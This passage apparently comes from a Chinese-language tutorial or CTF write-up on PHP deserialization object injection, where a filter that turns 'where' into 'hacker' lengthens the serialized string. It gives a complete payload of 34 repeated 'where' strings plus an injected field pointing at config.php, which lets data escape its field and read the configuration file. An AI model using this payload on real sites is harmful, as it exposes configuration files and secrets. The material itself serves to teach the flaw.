这里strlen我们可以用数组绕过,但是如果使用数组就会引起序列化字符串产生变化
a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:3:"xxx"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}
注意数组在序列化中的表示 是 先; 再 }
这里我进行了本地测试
结果:
红色部分为我们想注入的,蓝色的是我们提交payload的地方,后面实际上根本不用管
现在我们想的是通过where ->hacker 多了一个字符,这样使我们输入的nickname的值逃逸出去变成对象,
加上闭合前面的单引号和反括号 就是这样 ";}s:5:"photo";s:10:"config.php";}
一共就是34个字符, 一个where 逃逸出一个字符,这里就需要34个where
payload:wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
三.总结
武汉加油!中国加油!我加油!
以上所述是小编给大家介绍的PHP反序列化中过滤函数使用不当导致的对象注入问题,希望对大家有所帮助!